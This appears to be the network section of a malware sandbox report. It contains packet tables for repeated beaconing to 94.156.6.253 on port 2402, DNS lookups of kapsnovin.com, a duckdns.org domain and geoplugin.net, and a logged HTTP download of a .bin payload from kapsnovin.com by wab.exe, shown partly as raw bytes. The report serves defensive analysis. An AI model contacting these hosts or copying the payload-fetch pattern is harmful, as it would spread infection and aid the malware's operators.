                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.857008934 CEST500322402192.168.11.2094.156.6.253
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.857057095 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.857127905 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.857167959 CEST500322402192.168.11.2094.156.6.253
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.857214928 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.857285023 CEST500322402192.168.11.2094.156.6.253
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.857291937 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.857379913 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.857446909 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.857455015 CEST500322402192.168.11.2094.156.6.253
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.857536077 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.857556105 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.857574940 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.857593060 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.857609987 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.857628107 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.857645988 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.857651949 CEST500322402192.168.11.2094.156.6.253
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.857672930 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.857692957 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.857711077 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.857728004 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.857742071 CEST500322402192.168.11.2094.156.6.253
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.857750893 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.857794046 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.857795954 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.857814074 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.857820034 CEST500322402192.168.11.2094.156.6.253
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.857841969 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.857949972 CEST500322402192.168.11.2094.156.6.253
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.858028889 CEST500322402192.168.11.2094.156.6.253
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.858035088 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.858062029 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.858180046 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.858259916 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.858275890 CEST500322402192.168.11.2094.156.6.253
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.858283997 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.858335972 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.858381033 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.858458042 CEST500322402192.168.11.2094.156.6.253
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.858504057 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.858541965 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.858561039 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.858680010 CEST500322402192.168.11.2094.156.6.253
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.858715057 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.858763933 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.858769894 CEST500322402192.168.11.2094.156.6.253
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.858812094 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.858927011 CEST500322402192.168.11.2094.156.6.253
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.858937979 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.858968019 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.859013081 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.859112024 CEST500322402192.168.11.2094.156.6.253
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.859158993 CEST500322402192.168.11.2094.156.6.253
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.859321117 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.859344959 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.859374046 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.859500885 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.859555006 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.859574080 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.859592915 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.859602928 CEST500322402192.168.11.2094.156.6.253
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.859632015 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.859653950 CEST500322402192.168.11.2094.156.6.253
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.859687090 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.859730959 CEST500322402192.168.11.2094.156.6.253
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.859785080 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.859797001 CEST500322402192.168.11.2094.156.6.253
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.859812975 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.859895945 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.859915018 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.859997988 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.860004902 CEST500322402192.168.11.2094.156.6.253
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.860066891 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.860081911 CEST500322402192.168.11.2094.156.6.253
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.860163927 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.860183001 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.860246897 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.860264063 CEST500322402192.168.11.2094.156.6.253
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.860316038 CEST500322402192.168.11.2094.156.6.253
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.860393047 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.860459089 CEST500322402192.168.11.2094.156.6.253
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.860512972 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.860552073 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.860622883 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.860677004 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.860733032 CEST500322402192.168.11.2094.156.6.253
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.860757113 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.860796928 CEST500322402192.168.11.2094.156.6.253
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.860872984 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.860892057 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.860999107 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.861031055 CEST500322402192.168.11.2094.156.6.253
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.861078978 CEST500322402192.168.11.2094.156.6.253
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.861159086 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.861368895 CEST500322402192.168.11.2094.156.6.253
                                                                                                                                                                                                                        Oct 20, 2023 17:44:21.820226908 CEST500322402192.168.11.2094.156.6.253
                                                                                                                                                                                                                        Oct 20, 2023 17:44:21.820261955 CEST500322402192.168.11.2094.156.6.253
                                                                                                                                                                                                                        Oct 20, 2023 17:44:21.820307016 CEST500322402192.168.11.2094.156.6.253
                                                                                                                                                                                                                        Oct 20, 2023 17:44:22.132327080 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:22.132350922 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:22.132370949 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:22.132539988 CEST500322402192.168.11.2094.156.6.253
                                                                                                                                                                                                                        Oct 20, 2023 17:44:22.132580996 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:22.132663012 CEST500322402192.168.11.2094.156.6.253
                                                                                                                                                                                                                        Oct 20, 2023 17:44:22.132714987 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:22.444988966 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:22.445050955 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:22.445091963 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:22.447999954 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:22.448288918 CEST500322402192.168.11.2094.156.6.253
                                                                                                                                                                                                                        Oct 20, 2023 17:44:24.736381054 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:24.736670971 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:36.332252979 CEST24025003194.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:36.334891081 CEST500312402192.168.11.2094.156.6.253
                                                                                                                                                                                                                        Oct 20, 2023 17:44:36.716496944 CEST24025003194.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:45:06.347248077 CEST24025003194.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:45:06.349479914 CEST500312402192.168.11.2094.156.6.253
                                                                                                                                                                                                                        Oct 20, 2023 17:45:06.716454029 CEST24025003194.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:45:36.359857082 CEST24025003194.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:45:36.362181902 CEST500312402192.168.11.2094.156.6.253
                                                                                                                                                                                                                        Oct 20, 2023 17:45:36.732275963 CEST24025003194.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:46:00.338239908 CEST5003380192.168.11.20178.237.33.50
                                                                                                                                                                                                                        Oct 20, 2023 17:46:00.338246107 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:46:01.134712934 CEST5003380192.168.11.20178.237.33.50
                                                                                                                                                                                                                        Oct 20, 2023 17:46:01.322299957 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:46:02.728188038 CEST5003380192.168.11.20178.237.33.50
                                                                                                                                                                                                                        Oct 20, 2023 17:46:03.275408983 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:46:05.899414062 CEST5003380192.168.11.20178.237.33.50
                                                                                                                                                                                                                        Oct 20, 2023 17:46:06.376729965 CEST24025003194.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:46:06.379410982 CEST500312402192.168.11.2094.156.6.253
                                                                                                                                                                                                                        Oct 20, 2023 17:46:06.747682095 CEST24025003194.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:46:07.164639950 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:46:12.226121902 CEST5003380192.168.11.20178.237.33.50
                                                                                                                                                                                                                        Oct 20, 2023 17:46:14.928729057 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:46:24.879647017 CEST5003380192.168.11.20178.237.33.50
                                                                                                                                                                                                                        Oct 20, 2023 17:46:30.456619024 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:46:36.390216112 CEST24025003194.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:46:36.392357111 CEST500312402192.168.11.2094.156.6.253
                                                                                                                                                                                                                        Oct 20, 2023 17:46:36.763200045 CEST24025003194.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:46:50.170888901 CEST5003380192.168.11.20178.237.33.50
                                                                                                                                                                                                                        Oct 20, 2023 17:47:01.512202978 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:47:06.408801079 CEST24025003194.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:47:06.411336899 CEST500312402192.168.11.2094.156.6.253
                                                                                                                                                                                                                        Oct 20, 2023 17:47:06.779092073 CEST24025003194.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:47:36.426059008 CEST24025003194.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:47:36.429126978 CEST500312402192.168.11.2094.156.6.253
                                                                                                                                                                                                                        Oct 20, 2023 17:47:36.794799089 CEST24025003194.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:48:06.437314034 CEST24025003194.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:48:06.439564943 CEST500312402192.168.11.2094.156.6.253
                                                                                                                                                                                                                        Oct 20, 2023 17:48:06.810276985 CEST24025003194.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:48:36.460140944 CEST24025003194.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:48:36.462738037 CEST500312402192.168.11.2094.156.6.253
                                                                                                                                                                                                                        Oct 20, 2023 17:48:36.825867891 CEST24025003194.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:49:06.471245050 CEST24025003194.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:49:06.475698948 CEST500312402192.168.11.2094.156.6.253
                                                                                                                                                                                                                        Oct 20, 2023 17:49:06.841586113 CEST24025003194.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:49:36.489368916 CEST24025003194.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:49:36.490571022 CEST500312402192.168.11.2094.156.6.253
                                                                                                                                                                                                                        Oct 20, 2023 17:49:36.857172966 CEST24025003194.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:50:06.504784107 CEST24025003194.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:50:06.506527901 CEST500312402192.168.11.2094.156.6.253
                                                                                                                                                                                                                        Oct 20, 2023 17:50:06.873102903 CEST24025003194.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:50:36.539604902 CEST24025003194.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:50:36.544903994 CEST500312402192.168.11.2094.156.6.253
                                                                                                                                                                                                                        Oct 20, 2023 17:50:36.904263020 CEST24025003194.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:51:06.551881075 CEST24025003194.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:51:06.553317070 CEST500312402192.168.11.2094.156.6.253
                                                                                                                                                                                                                        Oct 20, 2023 17:51:06.920406103 CEST24025003194.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:51:36.584573030 CEST24025003194.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:51:36.586690903 CEST500312402192.168.11.2094.156.6.253
                                                                                                                                                                                                                        Oct 20, 2023 17:51:36.950958014 CEST24025003194.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:52:06.596429110 CEST24025003194.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:52:06.597831011 CEST500312402192.168.11.2094.156.6.253
                                                                                                                                                                                                                        Oct 20, 2023 17:52:06.966703892 CEST24025003194.156.6.253192.168.11.20
                                                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                        Oct 20, 2023 17:44:10.379450083 CEST6332453192.168.11.201.1.1.1
                                                                                                                                                                                                                        Oct 20, 2023 17:44:10.996531963 CEST53633241.1.1.1192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:14.095762968 CEST6413853192.168.11.201.1.1.1
                                                                                                                                                                                                                        Oct 20, 2023 17:44:14.340712070 CEST53641381.1.1.1192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:15.341156006 CEST6535253192.168.11.201.1.1.1
                                                                                                                                                                                                                        Oct 20, 2023 17:44:15.578038931 CEST53653521.1.1.1192.168.11.20
                                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                        Oct 20, 2023 17:44:10.379450083 CEST192.168.11.201.1.1.10xa0d5Standard query (0)kapsnovin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Oct 20, 2023 17:44:14.095762968 CEST192.168.11.201.1.1.10x51cStandard query (0)ourt2949aslumes9.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Oct 20, 2023 17:44:15.341156006 CEST192.168.11.201.1.1.10xad6fStandard query (0)geoplugin.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                        Oct 20, 2023 17:44:10.996531963 CEST1.1.1.1192.168.11.200xa0d5No error (0)kapsnovin.com77.238.121.250A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Oct 20, 2023 17:44:14.340712070 CEST1.1.1.1192.168.11.200x51cName error (3)ourt2949aslumes9.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Oct 20, 2023 17:44:15.578038931 CEST1.1.1.1192.168.11.200xad6fNo error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        • kapsnovin.com
                                                                                                                                                                                                                        • geoplugin.net
                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                        0192.168.11.205003077.238.121.25080C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                        Oct 20, 2023 17:44:11.404566050 CEST7OUTGET /KvGfOfeyMpEaqpzI164.bin HTTP/1.1
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                                                        Host: kapsnovin.com
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Oct 20, 2023 17:44:11.801636934 CEST8INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                        content-type: application/octet-stream
                                                                                                                                                                                                                        last-modified: Wed, 11 Oct 2023 04:41:30 GMT
                                                                                                                                                                                                                        accept-ranges: bytes
                                                                                                                                                                                                                        content-length: 494656
                                                                                                                                                                                                                        date: Fri, 20 Oct 2023 15:44:11 GMT
                                                                                                                                                                                                                        Oct 20, 2023 17:44:11.801719904 CEST9INData Raw: 32 4d 4b 79 e3 8a e2 1d 53 bc 85 a8 b0 44 62 46 b0 49 f6 6e 90 70 10 a4 95 82 dc d4 0a 0b b0 3e 76 c0 50 bf 8a 0b 38 9f 18 7d b4 d2 97 d9 47 02 2c b9 6a 63 0c c4 62 0c fe 74 c7 90 27 81 b3 74 14 ad 0d 72 c7 ee 36 89 bc 9c 1c a3 01 0d 60 9b 6a d1
                                                                                                                                                                                                                        Data Ascii: 2MKySDbFInp>vP8}G,jcbt'tr6`jU 8GXyG=zP)|%otzJkTm!_WR&bLkGLaArH~Oo#,XIOi/>oX7.RVp6sZbA,mG41g"
                                                                                                                                                                                                                        Oct 20, 2023 17:44:11.801789999 CEST10INData Raw: 3f 5e d9 23 e8 8f 4f 15 6b aa c7 94 3a b5 e3 dc 06 9f 06 2f 99 d0 25 df 84 2e c9 fb 3d 27 89 c8 5c 9d a9 c4 84 43 f8 70 e6 4a 5d b4 15 66 19 47 1e 90 89 d8 72 2c 2c 03 8a b8 c5 df 1a 6e bd 27 9b 3a 02 ca 84 8c 3d c9 5e e5 38 7b 25 72 9a 58 f3 dd
                                                                                                                                                                                                                        Data Ascii: ?^#Ok:/%.='\CpJ]fGr,,n':=^8{%rXyrSe'p|u>3Z^DxXnR|8UHl`.g4^=3V_$Kx,>6]ixgIlqoIBhFqdIQ2"H#Iqv@t/s1s.McW
                                                                                                                                                                                                                        Oct 20, 2023 17:44:11.801860094 CEST12INData Raw: dc ca 62 c3 2d 91 65 f1 b4 6d 50 5e bb bc 9d fd 04 8c 57 de e0 cd 7f 35 2c a5 e5 d8 a3 03 96 9a 83 7a 9a 7c d9 56 cc 88 bd 81 33 d8 38 a7 98 7b 68 58 59 95 e1 80 0c 6d 1a 55 a3 0b 53 4a 17 71 88 38 1d 9f 20 84 e8 b6 f8 8d f0 e4 d2 c3 fd 52 bc 72
                                                                                                                                                                                                                        Data Ascii: b-emP^W5,z|V38{hXYmUSJq8 Rr^)P~tqj.LSp@m|?{hcq"^J@2'l,7~Vw4iUG6LA`bHWPVJ4\bG44( NO1t$
                                                                                                                                                                                                                        Oct 20, 2023 17:44:11.801930904 CEST13INData Raw: 0a e0 a0 21 ee e0 ed 7f 54 00 3a 48 5d d7 04 ea e6 b8 03 5e c5 5d 9b 30 ee 36 89 33 a9 10 30 bb f2 ed df f6 c1 90 d4 e6 51 47 75 c8 d8 ce cf 47 ce a7 7c 74 9f f4 03 99 29 44 5b 00 b0 f6 96 a8 8e 06 ac a8 1e 8e 14 bb f3 43 7c a3 7f 21 5b 2d 39 8b
                                                                                                                                                                                                                        Data Ascii: !T:H]^]0630QGuG|t)D[C|![-9P^%^+MM,eKH,v_Rzpj'@G>VK'-Vzz(&9Z1,Ee<<_]|sLIK-5^nsCglb+78x/kG!Q[J:
                                                                                                                                                                                                                        Oct 20, 2023 17:44:11.802004099 CEST15INData Raw: 03 19 2d 77 b1 1a 9e 72 c4 2d 63 02 54 cd 4f 28 a3 fa 37 10 2b ea 3e f0 d6 3f 1a 4a a1 d0 47 8a 47 99 d3 61 f6 8d 7b 47 bd 6d 9f c1 65 fe d0 b6 f8 89 11 4e d2 1e 03 09 c6 63 d3 5d ec c1 f1 58 25 e5 bf d6 9c 82 6f 44 b2 54 fe 12 2d 58 46 91 1d 4a
                                                                                                                                                                                                                        Data Ascii: -wr-cTO(7+>?JGGa{GmeNc]X%oDT-XFJ3?P|&f{^dc}B,n?GMyPhfYrf-xFqY#X s8*Zfc>1p4i,ZK5K"YW*MY5LU
                                                                                                                                                                                                                        Oct 20, 2023 17:44:11.802077055 CEST16INData Raw: af ae 1a 0b 99 d2 d1 4e c0 a8 5d 44 e2 a4 38 c5 76 33 bd 50 21 ef 77 7c b6 42 c2 4d 5e 72 80 f6 ba 73 17 11 7e c2 1e 03 0e 5d e3 13 7c 40 7b 2a 4a a6 13 7c 0d 85 b6 83 d1 b1 df 0e 12 28 51 c3 19 58 5d 2d 3b 79 db 3d 11 71 13 cd 53 89 58 3a e0 10
                                                                                                                                                                                                                        Data Ascii: N]D8v3P!w|BM^rs~]|@{*J|(QX]-;y=qSX:"|@6b_A4M?vTC/fz6h67amWQ[{+#lHI syY^OnRDfshP?k6!jL*@}l";'bo<
                                                                                                                                                                                                                        Oct 20, 2023 17:44:11.802146912 CEST17INData Raw: c4 61 d9 67 a7 55 95 51 91 0b 45 c2 eb 85 d1 d0 ca 3d d0 52 3c 51 05 25 c0 27 9c b0 f8 0b 4e 4c 08 38 a6 a0 9c bf 8c 1e 94 47 75 f4 e5 12 2b fe cc 3c c0 ae 40 66 c1 2d c6 02 71 c7 b6 1c 4b 5a e7 c6 ce dd dd f1 ca 0d a1 07 00 39 61 48 fe 06 fc fc
                                                                                                                                                                                                                        Data Ascii: agUQE=R<Q%'NL8Gu+<@f-qKZ9aH3toi'vL']^ dh1:||J:EqU#_A%=B#Y 9(r4X1|1,NY>;9;o@YK:O
                                                                                                                                                                                                                        Oct 20, 2023 17:44:11.802217007 CEST19INData Raw: 3b 3a c3 fc d9 f9 91 ca 49 88 9b 77 51 e3 d6 34 1c b4 f5 61 96 8b 79 24 6a a6 ac fe 2e f1 66 b9 8b 88 a8 10 f9 9b 61 6e b1 e4 e6 05 c9 be 12 af 9d 9c f7 d9 78 ea e6 1d aa d5 3e 0e ef f4 62 de f7 55 fc e3 d1 88 9c 77 36 cd 01 00 91 9b f3 ef de c1
                                                                                                                                                                                                                        Data Ascii: ;:IwQ4ay$j.fanx>bUw6%[`uS_`uEqz3_2cJ#IF_ME zg?%W:M;VKhF\BO^8U|emxX6)K*;Ub/K?FM~\DZ(o&Q8/Dd
                                                                                                                                                                                                                        Oct 20, 2023 17:44:11.802289009 CEST20INData Raw: 3f 68 83 e2 59 4a 6c 0d ba b2 83 80 47 20 f1 12 28 5e db 85 78 4c a7 c8 1a a9 e4 ce 05 f5 bc 9c 63 17 9b d9 ad f3 a9 de 1e 81 11 0b 51 e2 86 8a f6 06 81 47 4c 03 fd 9c ad 24 be aa c1 f1 31 30 1d a4 f0 87 6c 07 4c a7 0b e0 34 1b 9f 63 81 8b 3e d2
                                                                                                                                                                                                                        Data Ascii: ?hYJlG (^xLcQGL$10lL4c>k1YG3m##Ol8!A$qwK)e%WJ;>H)F$d,8YW0Cgo5,U?2KZ=Ra[urd.wR
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.195492983 CEST21INData Raw: d5 0f 2a fc 6e 8e 29 96 67 79 87 29 11 71 68 dd d0 9a f0 93 8b e2 ff a9 c0 60 ba 6e 31 a1 9b 67 d5 7d c0 f4 58 aa 07 d6 d4 ea 88 e5 65 05 e5 8e 90 4c ec 6b e4 72 69 ce 54 81 d9 09 8e d9 b8 5c 67 99 b1 8d 6a bd c7 eb 80 ca 20 16 1d 60 2b 6b 8e 1a
                                                                                                                                                                                                                        Data Ascii: *n)gy)qh`n1g}XeLkriT\gj `+kZe#)!+Y@^4h_$\z"K:xKCwSe6+mp(|WF8exuNczk&uwj>aL\P>m!e


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                        1192.168.11.2050033178.237.33.5080C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
